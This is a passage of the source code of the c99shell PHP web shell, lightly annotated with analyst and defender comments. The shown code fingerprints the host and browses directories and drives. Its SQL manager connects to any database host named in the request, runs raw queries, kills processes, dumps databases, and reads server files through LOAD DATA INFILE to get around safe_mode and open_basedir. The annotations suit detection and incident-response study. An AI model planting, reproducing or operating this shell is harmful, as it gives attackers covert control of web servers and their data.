 if ($a[text_not])
 {
 if ($true) {$true = false;}
 else {$true = true;}
 }
 if ($true) {$found[] = $d.$f; $found_f++;}
 }
 else {$found[] = $d.$f; $found_f++;}
 }
 }
 }
 }
 closedir($handle);
}
}
566//Sending headers
// No-cache response headers. These are common PHP boilerplate and not a useful signature by themselves.
header("Expires: Mon, 26 Jul 1997 05:00:00 GMT");
header("Last-Modified: ".gmdate("D, d M Y H:i:s")." GMT");
header("Cache-Control: no-store, no-cache, must-revalidate");
header("Cache-Control: post-check=0, pre-check=0", false);
header("Pragma: no-cache");

global $SERVER_SOFTWARE;
// Platform flag used by later code to choose Windows or Unix behaviour.
if (strtolower(substr(PHP_OS, 0, 3)) == "win") {$win = 1;}
else {$win = 0;}

// Fallback temp directory when none is configured, then separator normalisation.
if (empty($tmpdir))
{
 if (!$win) {$tmpdir = "/tmp/";}
 else {$tmpdir = $_ENV[SystemRoot];}
}
$tmpdir = str_replace("\\","/",$tmpdir);
// NOTE(review): the subtraction sits inside strlen() here (strlen($tmpdir-1)), unlike the trailing-slash
// checks elsewhere in the file.
if (substr($tmpdir,strlen($tmpdir-1),strlen($tmpdir)) != "/") {$tmpdir .= "/";}
// Environment fingerprinting for the status panel. The labels are written from the operator's point of
// view: an active safe_mode / open_basedir restriction is shown in red, its absence in green.
// Reviewer note (defensive): the "OFF (not secure)" markup is another response-body string usable for
// detection of a rendered shell page.
if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on")
{
 $safemode = true;
 $hsafemode = "<font color=\"red\">ON (secure)</font>";
}
else {$safemode = false; $hsafemode = "<font color=\"green\">OFF (not secure)</font>";}
$v = @ini_get("open_basedir");
if ($v or strtolower($v) == "on")
{
 $openbasedir = true;
 $hopenbasedir = "<font color=\"red\">".$v."</font>";
}
else {$openbasedir = false; $hopenbasedir = "<font color=\"green\">OFF (not secure)</font>";}

// $sort is not assigned in the visible code; it is HTML-escaped here before later use.
$sort = htmlspecialchars($sort);

// Turns the "PHP/<version>" token of the server banner into a link to the phpinfo action.
$DISP_SERVER_SOFTWARE = str_replace("PHP/".phpversion(),"<a href=\"".$surl."act=phpinfo\" target=\"_blank\"><b><u>PHP/".phpversion()."</u></b></a>",$SERVER_SOFTWARE);

// Apply the configured colours to PHP's source highlighter; the trailing comments are the author's.
@ini_set("highlight.bg",$highlight_bg); //FFFFFF
@ini_set("highlight.comment",$highlight_comment); //#FF8000
@ini_set("highlight.default",$highlight_default); //#0000BB
@ini_set("highlight.html",$highlight_html); //#000000
@ini_set("highlight.keyword",$highlight_keyword); //#007700
@ini_set("highlight.string","#DD0000"); //#DD0000
608
609if ($act != "img")
610{
611if (!is_array($actbox)) {$actbox = array();}
612$dspact = $act = htmlspecialchars($act);
613$disp_fullpath = $ls_arr = $notls = null;
614$ud = urlencode($d);
615?><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1251"><meta http-equiv="Content-Language" content="en-us"><title><? echo $HTTP_HOST; ?> - c99shell</title><STYLE>TD { FONT-SIZE: 8pt; COLOR: #ebebeb; FONT-FAMILY: verdana;}BODY { scrollbar-face-color: #800000; scrollbar-shadow-color: #101010; scrollbar-highlight-color: #101010; scrollbar-3dlight-color: #101010; scrollbar-darkshadow-color: #101010; scrollbar-track-color: #101010; scrollbar-arrow-color: #101010; font-family: Verdana,;}TD.header { FONT-WEIGHT: normal; FONT-SIZE: 10pt; BACKGROUND: #7d7474; COLOR: white; FONT-FAMILY: verdana;}A { FONT-WEIGHT: normal; COLOR: #dadada; FONT-FAMILY: verdana; TEXT-DECORATION: none;}A:unknown { FONT-WEIGHT: normal; COLOR: #ffffff; FONT-FAMILY: verdana; TEXT-DECORATION: none;}A.Links { COLOR: #ffffff; TEXT-DECORATION: none;}A.Links:unknown { FONT-WEIGHT: normal; COLOR: #ffffff; TEXT-DECORATION: none;}A:hover { COLOR: #ffffff; TEXT-DECORATION: underline;}.skin0{position:absolute; width:200px; border:2px solid black; background-color:menu; font-family:Verdana; line-height:20px; cursor:default; visibility:hidden;;}.skin1{cursor: default; font: menutext; position: absolute; width: 145px; background-color: menu; border: 1 solid buttonface;visibility:hidden; border: 2 outset buttonhighlight; font-family: Verdana,Geneva, Arial; font-size: 10px; color: black;}.menuitems{padding-left:15px; padding-right:10px;;}input{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}textarea{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}button{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}select{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}option {background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid 
#666666;}iframe {background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}p {MARGIN-TOP: 0px; MARGIN-BOTTOM: 0px; LINE-HEIGHT: 150%}blockquote{ font-size: 8pt; font-family: Courier, Fixed, Arial; border : 8px solid #A9A9A9; padding: 1em; margin-top: 1em; margin-bottom: 5em; margin-right: 3em; margin-left: 4em; background-color: #B7B2B0;}</STYLE><style type="text/css"><!--body,td,th { font-family: verdana; color: #d9d9d9; font-size: 11px;}body { background-color: #000000;}--></style></head><BODY text=#ffffff bottomMargin=0 bgColor=#000000 leftMargin=0 topMargin=0 rightMargin=0 marginheight=0 marginwidth=0>
616<center><TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=5 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1 bordercolor="#C0C0C0"><tr><th width="101%" height="15" nowrap bordercolor="#C0C0C0" valign="top" colspan="2"><p><font face=Webdings size=6><b>!</b></font><a href="<? echo $surl; ?>"><font face="Verdana" size="5"><b><u>C99Shell v. <?php echo $shver; ?></u></b></font></a><font face=Webdings size=6><b>!</b></font></p></center></th></tr><tr><td><p align="left"><b>Software: <?php echo $DISP_SERVER_SOFTWARE; ?></b> </p><p align="left"><b>uname -a: <?php echo php_uname(); ?></b> </p><p align="left"><b><?php if (!$win) {echo `id`;} else {echo get_current_user();} ?></b> </p><p align="left"><b>Safe-mode: <?php echo $hsafemode; ?></b></p><p align="left"><?php
// Analyst annotation: page-header logic that normalises the working directory in $d,
// prints it as a clickable breadcrumb, and then reports writability, disk space and
// (on Windows) the drive letters that exist. $d, $surl, $sort, $f, $win and
// $quicklaunch are set outside this excerpt.
// Convert Windows separators, resolve $d with realpath() (falling back to the
// script's own directory when $d is empty) and force a trailing slash.
617$d = str_replace("\\","/",$d);
618if (empty($d)) {$d = realpath(".");} elseif(realpath($d)) {$d = realpath($d);}
619$d = str_replace("\\","/",$d);
620if (substr($d,strlen($d)-1,1) != "/") {$d .= "/";}
621$dispd = htmlspecialchars($d);
622$pd = $e = explode("/",substr($d,0,strlen($d)-1));
623$i = 0;
624echo "<b>Directory: </b>";
// One link per path component: the inner loop rebuilds the prefix up to component $i.
// Each link re-requests this script with act=ls&d=<prefix>; that query shape is what
// directory browsing through this script looks like in web-server access logs.
// $t is HTML-escaped and then URL-encoded; $sort is concatenated without escaping.
625foreach($pd as $b)
626{
627 $t = "";
628 reset($e);
629 $j = 0;
630 foreach ($e as $r)
631 {
632 $t.= $r."/";
633 if ($j == $i) {break;}
634 $j++;
635 }
636 echo "<a href=\"".$surl."act=ls&d=".urlencode(htmlspecialchars($t))."/&sort=".$sort."\"><b>".htmlspecialchars($b)."/</b></a>";
637 $i++;
638}
639echo " ";
// Records whether the account PHP runs as can write to $d ($wd, $wdt) and prints the
// mode string returned by view_perms() (helper defined elsewhere in the file).
// Note the two branches pass different paths to fileperms(): $d versus $d.$f.
640if (is_writable($d))
641{
642 $wd = true;
643 $wdt = "<font color=\"green\">[ ok ]</font>";
644 echo "<b><font color=\"green\">".view_perms(fileperms($d))."</font></b>";
645}
646else
647{
648 $wd = false;
649 $wdt = "<font color=\"red\">[ Read-Only ]</font>";
650 echo "<b><font color=\"red\">".view_perms(fileperms($d.$f))."</font></b>";
651}
// Disk statistics for the volume holding $d. diskfreespace() is PHP's alias of
// disk_free_space(); a false/zero result from either call is coerced to 0.
// view_size() is a formatting helper defined elsewhere.
652$free = diskfreespace($d);
653if (!$free) {$free = 0;}
654$all = disk_total_space($d);
655if (!$all) {$all = 0;}
656$used = $all-$free;
657$used_percent = round(100/($all/$free),2);
658echo "<br><b>Free ".view_size($free)." of ".view_size($all)." (".$used_percent."%)</b><br>";
// Each $quicklaunch entry is a (label, URL) pair; the %d and %upd placeholders in the
// URL are replaced with the URL-encoded current directory and its parent.
659if (count($quicklaunch) > 0)
660{
661 foreach($quicklaunch as $item)
662 {
663 $item[1] = str_replace("%d",urlencode($d),$item[1]);
664 $item[1] = str_replace("%upd",urlencode(realpath($d."..")),$item[1]);
665 echo "<a href=\"".$item[1]."\"><u>".$item[0]."</u></a> ";
666 }
667}
// Windows only: probes every letter in $abc with is_dir("<letter>:/") and prints a link
// for each drive that exists; the drive that $d is on is shown in green.
668$letters = "";
669if ($win)
670{
671 $abc = array("c", "d", "e", "f", "g", "h", "i", "j", "k", "l", "m", "o", "p", "q", "n", "r", "s", "t", "v", "u", "w", "x", "y", "z");
672 $v = explode("/",$d);
673 $v = $v[0];
674 foreach ($abc as $letter)
675 {
676 if (is_dir($letter.":/"))
677 {
678 if ($letter.":" != $v) {$letters .= "<a href=\"".$surl."act=ls&d=".$letter.":\">[ ".$letter." ]</a> ";}
679 else {$letters .= "<a href=\"".$surl."act=ls&d=".$letter.":\">[ <font color=\"green\">".$letter."</font> ]</a> ";}
680 }
681 }
682 if (!empty($letters)) {echo "<br><b>Detected drives</b>: ".$letters;}
683}
684?></p></td></tr></table><br><?php
685if ((!empty($donated_html)) and (in_array($act,$donated_act)))
686{
687 ?><TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td width="100%" valign="top"><?php echo $donated_html; ?></td></tr></table><br><?php
688}
689?><TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td width="100%" valign="top"><?php
690if ($act == "") {$act = $dspact = "ls";}
691if ($act == "sql")
692{
// Analyst annotation: builds $sql_surl, the base URL reused by the SQL-manager links
// below, by appending the database login, password, server, port and database name
// as query parameters (HTML-escaped with htmlspecialchars(), not URL-encoded).
// Defender note: the connection forms further down have no method attribute, so they
// submit by GET as well. Database credentials therefore end up in the query string,
// where web-server access logs, proxies and Referer headers can record them. Strings
// such as "act=sql", "sql_login=" and "sql_passwd=" are usable log-search patterns,
// and any credentials found that way should be rotated during incident response.
693 $sql_surl = $surl."act=sql";
694 if ($sql_login) {$sql_surl .= "&sql_login=".htmlspecialchars($sql_login);}
695 if ($sql_passwd) {$sql_surl .= "&sql_passwd=".htmlspecialchars($sql_passwd);}
696 if ($sql_server) {$sql_surl .= "&sql_server=".htmlspecialchars($sql_server);}
697 if ($sql_port) {$sql_surl .= "&sql_port=".htmlspecialchars($sql_port);}
698 if ($sql_db) {$sql_surl .= "&sql_db=".htmlspecialchars($sql_db);}
699 $sql_surl .= "&";
700 ?><TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=5 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1 bordercolor="#C0C0C0"><tr><td width="100%" height="1" colspan="2" valign="top"><center><?php
// Analyst annotation: opens a MySQL connection to "$sql_server:$sql_port" with the
// supplied login and password, keeps any connection error text in $err, selects
// $sql_db (errors suppressed with @) and, when both $sql_query and $submit are set,
// runs $sql_query exactly as received. Without $sql_server no connection is attempted.
// The mysql_* functions belong to the legacy ext/mysql extension, which was removed
// in PHP 7.0; on newer runtimes without a compatibility shim this branch cannot run.
// Defender note: the target host is whatever the request names, so the web tier can
// be made to connect to arbitrary database hosts. Egress filtering of database ports
// from web servers and least-privilege database accounts limit what this reaches.
701 if ($sql_server)
702 {
703 $sql_sock = mysql_connect($sql_server.":".$sql_port, $sql_login, $sql_passwd);
704 $err = mysql_error();
705 @mysql_select_db($sql_db,$sql_sock);
706 if ($sql_query and $submit) {$sql_query_result = mysql_query($sql_query,$sql_sock); $sql_query_error = mysql_error();}
707 }
708 else {$sql_sock = false;}
709 echo "<b>SQL Manager:</b><br>";
710 if (!$sql_sock)
711 {
712 if (!$sql_server) {echo "NO CONNECTION";}
713 else {echo "<center><b>Can't connect</b></center>"; echo "<b>".$err."</b>";}
714 }
715 else
716 {
717 $sqlquicklaunch = array();
718 $sqlquicklaunch[] = array("Index",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&");
719 if (!$sql_db) {$sqlquicklaunch[] = array("Query","#\" onclick=\"alert('Please, select DB!')");}
720 else {$sqlquicklaunch[] = array("Query",$sql_surl."sql_act=query");}
721 $sqlquicklaunch[] = array("Server-status",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=serverstatus");
722 $sqlquicklaunch[] = array("Server variables",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=servervars");
723 $sqlquicklaunch[] = array("Processes",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=processes");
724 $sqlquicklaunch[] = array("Logout",$surl."act=sql");
725
726 echo "<center><b>MySQL ".mysql_get_server_info()." (proto v.".mysql_get_proto_info ().") running in ".htmlspecialchars($sql_server).":".htmlspecialchars($sql_port)." as ".htmlspecialchars($sql_login)."@".htmlspecialchars($sql_server)." (password - \"".htmlspecialchars($sql_passwd)."\")</b><br>";
727
728 if (count($sqlquicklaunch) > 0) {foreach($sqlquicklaunch as $item) {echo "[ <a href=\"".$item[1]."\"><u>".$item[0]."</u></a> ] ";}}
729 echo "</center>";
730 }
731 echo "</td></tr><tr>";
732 if (!$sql_sock) {?><td width="28%" height="100" valign="top"><center><font size="5"> i </font></center><li>If login is null, login is owner of process.<li>If host is null, host is localhost</b><li>If port is null, port is 3306 (default)</td><td width="90%" height="1" valign="top"><TABLE height=1 cellSpacing=0 cellPadding=0 width="100%" border=0><tr><td> <b>Please, fill the form:</b><table><tr><td>Username</td><td align=right>Password </td></tr><form><input type="hidden" name="act" value="sql"><tr><td><input type="text" name="sql_login" value="root" maxlength="64"></td><td align=right><input type="password" name="sql_passwd" value="" maxlength="64"></td></tr><tr><td>HOST</td><td>PORT</td></tr><tr><td><input type="text" name="sql_server" value="localhost" maxlength="64"></td><td><input type="text" name="sql_port" value="3306" maxlength="6" size="3"><input type="submit" value="Connect"></td></tr><tr><td></td></tr></form></table></td><?php }
733 else
734 {
735 //Start left panel
736 if (!empty($sql_db))
737 {
738 ?><td width="25%" height="100%" valign="top"><a href="<?php echo $surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&"; ?>"><b>Home</b></a><hr size="1" noshade><?php
739 $result = mysql_list_tables($sql_db);
740 if (!$result) {echo mysql_error();}
741 else
742 {
743 echo "---[ <a href=\"".$sql_surl."&\"><b>".htmlspecialchars($sql_db)."</b></a> ]---<br>";
744 $c = 0;
745 while ($row = mysql_fetch_array($result)) {$count = mysql_query ("SELECT COUNT(*) FROM $row[0]"); $count_row = mysql_fetch_array($count); echo "<b>» <a href=\"".$sql_surl."sql_db=".htmlspecialchars($sql_db)."&sql_tbl=".htmlspecialchars($row[0])."\"><b>".htmlspecialchars($row[0])."</b></a> (".$count_row[0].")</br></b>
746"; mysql_free_result($count); $c++;}
747 if (!$c) {echo "No tables found in database.";}
748 }
749 }
750 else
751 {
752 ?><td width="1" height="100" valign="top"><a href="<?php echo $sql_surl; ?>"><b>Home</b></a><hr size="1" noshade><?php
753 $result = mysql_list_dbs($sql_sock);
754 if (!$result) {echo mysql_error();}
755 else
756 {
757 ?><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><select name="sql_db"><?php
758 echo "<option value=\"\">Databases (...)</option>
759";
760 $c = 0;
761 while ($row = mysql_fetch_row($result)) {echo "<option value=\"".$row[0]."\""; if ($sql_db == $row[0]) {echo " selected";} echo ">".$row[0]."</option>
762"; $c++;}
763 }
764 ?></select><hr size="1" noshade>Please, select database<hr size="1" noshade><input type="submit" value="Go"></form><?php
765 }
766 //End left panel
767 echo "</td><td width=\"100%\" height=\"1\" valign=\"top\">";
768 //Start center panel
769 if ($sql_db)
770 {
771 echo "<center><b>There are ".$c." tables in this DB (".htmlspecialchars($sql_db).").<br>";
772 if (count($dbquicklaunch) > 0) {foreach($dbsqlquicklaunch as $item) {echo "[ <a href=\"".$item[1]."\"><u>".$item[0]."</u></a> ] ";}}
773 echo "</b></center>";
774
775 $acts = array("","dump");
776
777 if ($sql_act == "query")
778 {
779 echo "<hr size=\"1\" noshade>";
780 if ($submit)
781 {
782 if ((!$sql_query_result) and ($sql_confirm)) {if (!$sql_query_error) {$sql_query_error = "Query was empty";} echo "<b>Error:</b> <br>".$sql_query_error."<br>";}
783 }
784 if ($sql_query_result or (!$sql_confirm)) {$sql_act = $sql_goto;}
785 if ((!$submit) or ($sql_act)) {echo "<form method=\"POST\"><b>"; if (($sql_query) and (!$submit)) {echo "Do you really want to :";} else {echo "SQL-Query :";} echo "</b><br><br><textarea name=\"sql_query\" cols=\"60\" rows=\"10\">".htmlspecialchars($sql_query)."</textarea><br><br><input type=\"hidden\" name=\"submit\" value=\"1\"><input type=\"hidden\" name=\"sql_goto\" value=\"".htmlspecialchars($sql_goto)."\"><input type=\"submit\" name=\"sql_confirm\" value=\"Yes\"> <input type=\"submit\" value=\"No\"></form>";}
786 }
787 if (in_array($sql_act,$acts))
788 {
789 ?><table border="0" width="100%" height="1"><tr><td width="30%" height="1"><b>Create new table:</b><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="newtbl"><input type="hidden" name="sql_db" value="<?php echo htmlspecialchars($sql_db); ?>"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="sql_newtbl" size="20"> <input type="submit" value="Create"></form></td><td width="30%" height="1"><b>SQL-Dump DB:</b><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="dump"><input type="hidden" name="sql_db" value="<?php echo htmlspecialchars($sql_db); ?>"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="dump_file" size="30" value="<?php echo "dump_".$SERVER_NAME."_".$sql_db."_".date("d-m-Y-H-i-s").".sql"; ?>"> <input type="submit" name=\"submit\" value="Dump"></form></td><td width="30%" height="1"></td></tr><tr><td width="30%" height="1"></td><td width="30%" height="1"></td><td width="30%" height="1"></td></tr></table><?php
790 if (!empty($sql_act)) {echo "<hr size=\"1\" noshade>";}
791 if ($sql_act == "newtpl")
792 {
793 echo "<b>";
794 if ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) {echo "DB \"".htmlspecialchars($sql_newdb)."\" has been created with success!</b><br>";
795 }
796 else {echo "Can't create DB \"".htmlspecialchars($sql_newdb)."\".<br>Reason:</b> ".mysql_error();}
797 }
798 elseif ($sql_act == "dump")
799 {
800 $set = array();
801 $set["sock"] = $sql_sock;
802 $set["db"] = $sql_db;
803 $dump_out = "print";
804 if ($dump_out == "print") {$set["print"] = 1; $set["nl2br"] = 1;}
805 elseif ($dump_out == "download")
806 {
807 @ob_clean();
808 header("Content-type: c99shell");
809 header("Content-disposition: attachment; filename=\"".$f."\";");
810 $set["print"] = 1;
811 $set["nl2br"] = 1;
812 }
813 $set["file"] = $dump_file;
814 $set["add_drop"] = true;
815 $ret = mysql_dump($set);
816 if ($dump_out == "download") {exit;}
817 }
818 else
819 {
820 $result = mysql_query("SHOW TABLE STATUS", $sql_sock) or print(mysql_error());
821 echo "<br><form method=\"POST\"><TABLE cellSpacing=0 cellPadding=1 bgColor=#333333 borderColorLight=#333333 border=1>";
822 echo "<tr>";
823 echo "<td><input type=\"checkbox\" name=\"boxtbl_all\" value=\"1\"></td>";
824 echo "<td><center><b>Table</b></center></td>";
825 echo "<td><b>Rows</b></td>";
826 echo "<td><b>Type</b></td>";
827 echo "<td><b>Created</b></td>";
828 echo "<td><b>Modified</b></td>";
829 echo "<td><b>Size</b></td>";
830 echo "<td><b>Action</b></td>";
831 echo "</tr>";
832 $i = 0;
833 $tsize = $trows = 0;
834 while ($row = mysql_fetch_array($result, MYSQL_NUM))
835 {
836 $tsize += $row["5"];
837 $trows += $row["5"];
838 $size = view_size($row["5"]);
839 echo "<tr>";
840 echo "<td><input type=\"checkbox\" name=\"boxtbl[]\" value=\"".$row[0]."\"></td>";
841 echo "<td> <a href=\"".$sql_surl."sql_db=".htmlspecialchars($sql_db)."&sql_tbl=".htmlspecialchars($row[0])."\"><b>".$row[0]."</b></a> </td>";
842 echo "<td>".$row[3]."</td>";
843 echo "<td>".$row[1]."</td>";
844 echo "<td>".$row[10]."</td>";
845 echo "<td>".$row[11]."</td>";
846 echo "<td>".$size."</td>";
847 echo "<td>
848 <a href=\"".$sql_surl."sql_act=query&sql_query=".urlencode("DELETE FROM `".$row[0]."`")."\"><img src=\"".$surl."act=img&img=sql_button_empty\" height=\"13\" width=\"11\" border=\"0\"></a>
849 <a href=\"".$sql_surl."sql_act=query&sql_query=".urlencode("DROP TABLE `".$row[0]."`")."\"><img src=\"".$surl."act=img&img=sql_button_drop\" height=\"13\" width=\"11\" border=\"0\"></a>
850<a href=\"".$sql_surl."sql_act=query&sql_query=".urlencode("DROP TABLE `".$row[0]."`")."\"><img src=\"".$surl."act=img&img=sql_button_insert\" height=\"13\" width=\"11\" border=\"0\"></a>
851</td>";
852 echo "</tr>";
853 $i++;
854 }
855 echo "<tr bgcolor=\"000000\">";
856 echo "<td><center><b>»</b></center></td>";
857 echo "<td><center><b>".$i." table(s)</b></center></td>";
858 echo "<td><b>".$trows."</b></td>";
859 echo "<td>".$row[1]."</td>";
860 echo "<td>".$row[10]."</td>";
861 echo "<td>".$row[11]."</td>";
862 echo "<td><b>".view_size($tsize)."</b></td>";
863 echo "<td></td>";
864 echo "</tr>";
865 echo "</table><hr size=\"1\" noshade><img src=\"".$surl."act=img&img=arrow_ltr\" border=\"0\"><select name=\"actselect\">
866<option>With selected:</option>
867<option value=\"drop\" >Drop</option>
868<option value=\"empty\" >Empty</option>
869<option value=\"chk\">Check table</option>
870<option value=\"Optimize table\">Optimize table</option>
871<option value=\"Repair table\">Repair table</option>
872<option value=\"Analyze table\">Analyze table</option>
873</select> <input type=\"submit\" value=\"Confirm\"></form>";
874 mysql_free_result($result);
875 }
876 }
877 }
878 else
879 {
880 $acts = array("","newdb","serverstat","servervars","processes","getfile");
881 if (in_array($sql_act,$acts))
882 {
883 ?><table border="0" width="100%" height="1"><tr><td width="30%" height="1"><b>Create new DB:</b><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="newdb"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="sql_newdb" size="20"> <input type="submit" value="Create"></form></td><td width="30%" height="1"><b>View File:</b><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="getfile"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="sql_getfile" size="30" value="<?php echo htmlspecialchars($sql_getfile); ?>"> <input type="submit" value="Get"></form></td><td width="30%" height="1"></td></tr><tr><td width="30%" height="1"></td><td width="30%" height="1"></td><td width="30%" height="1"></td></tr></table><?php
884 }
885 if (!empty($sql_act))
886 {
887 echo "<hr size=\"1\" noshade>";
888 if ($sql_act == "newdb")
889 {
890 echo "<b>";
891 if ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) {echo "DB \"".htmlspecialchars($sql_newdb)."\" has been created with success!</b><br>";}
892 else {echo "Can't create DB \"".htmlspecialchars($sql_newdb)."\".<br>Reason:</b> ".mysql_error();}
893 }
894 if ($sql_act == "serverstatus")
895 {
896 $result = mysql_query("SHOW STATUS", $sql_sock);
897 echo "<center><b>Server-status variables:</b><br><br>";
898 echo "<TABLE cellSpacing=0 cellPadding=0 bgColor=#333333 borderColorLight=#333333 border=1><td><b>Name</b></td><td><b>value</b></td></tr>";
899 while ($row = mysql_fetch_array($result, MYSQL_NUM)) {echo "<tr><td>".$row[0]."</td><td>".$row[1]."</td></tr>";}
900 echo "</table></center>";
901 mysql_free_result($result);
902 }
903 if ($sql_act == "servervars")
904 {
905 $result = mysql_query("SHOW VARIABLES", $sql_sock);
906 echo "<center><b>Server variables:</b><br><br>";
907 echo "<TABLE cellSpacing=0 cellPadding=0 bgColor=#333333 borderColorLight=#333333 border=1><td><b>Name</b></td><td><b>value</b></td></tr>";
908 while ($row = mysql_fetch_array($result, MYSQL_NUM)) {echo "<tr><td>".$row[0]."</td><td>".$row[1]."</td></tr>";}
909 echo "</table>";
910 mysql_free_result($result);
911 }
// Analyst annotation: two SQL-manager actions selected by $sql_act.
// "processes": optionally issues KILL for the id in $kill (concatenated into the
// statement as received), then prints the rows of SHOW PROCESSLIST with a Kill link
// per row. Row values are echoed into the HTML without escaping.
912 if ($sql_act == "processes")
913 {
914 if (!empty($kill)) {$query = 'KILL ' . $kill . ';'; $result = mysql_query($query, $sql_sock); echo "<b>Killing process #".$kill."... ok. he is dead, amen.</b>";}
915 $result = mysql_query("SHOW PROCESSLIST", $sql_sock);
916 echo "<center><b>Processes:</b><br><br>";
917 echo "<TABLE cellSpacing=0 cellPadding=2 bgColor=#333333 borderColorLight=#333333 border=1><td><b>ID</b></td><td><b>USER</b></td><td><b>HOST</b></td><td><b>DB</b></td><td><b>COMMAND</b></td><td><b>TIME</b></td><td>STATE</td><td><b>INFO</b></td><td><b>Action</b></td></tr>";
918 while ($row = mysql_fetch_array($result, MYSQL_NUM)) { echo "<tr><td>".$row[0]."</td><td>".$row[1]."</td><td>".$row[2]."</td><td>".$row[3]."</td><td>".$row[4]."</td><td>".$row[5]."</td><td>".$row[6]."</td><td>".$row[7]."</td><td><a href=\"".$sql_surl."sql_act=processes&kill=".$row[0]."\"><u>Kill</u></a></td></tr>";}
919 echo "</table>";
920 mysql_free_result($result);
921 }
// "getfile": has the database server read a file instead of PHP. It creates a scratch
// database "tmp_bd" with a one-column table "tmp_file", loads the path in $sql_getfile
// into it with LOAD DATA INFILE, prints the concatenated rows (HTML-escaped) and then
// drops the scratch database. The column name states the purpose: viewing files when
// PHP's safe_mode/open_basedir restrictions apply to the script itself.
// Defender note: this depends on the database account holding the FILE privilege.
// Withholding FILE from application accounts and restricting the server's
// secure_file_priv setting remove the primitive. The fixed names "tmp_bd" and
// "tmp_file" are searchable in database query/audit logs, and the scratch database
// is left behind whenever the final drop fails.
922 elseif (($sql_act == "getfile"))
923 {
924 if (!mysql_create_db("tmp_bd")) {echo mysql_error();}
925 elseif (!mysql_select_db("tmp_bd")) {echo mysql_error();}
926 elseif (!mysql_query('CREATE TABLE `tmp_file` ( `Viewing the file in safe_mode+open_basedir` LONGBLOB NOT NULL );')) {echo mysql_error();}
927 else {mysql_query("LOAD DATA INFILE \"".addslashes($sql_getfile)."\" INTO TABLE tmp_file"); $query = "SELECT * FROM tmp_file"; $result = mysql_query($query); if (!$result) {echo "Error in query \"".$query."\": ".mysql_error();}
928 else
929 {
930 for ($i=0;$i<mysql_num_fields($result);$i++) {$name = mysql_field_name($result,$i);}
931 $f = "";
932 while ($line = mysql_fetch_array($result, MYSQL_ASSOC)) {foreach ($line as $key =>$col_value) {$f .= $col_value;}}
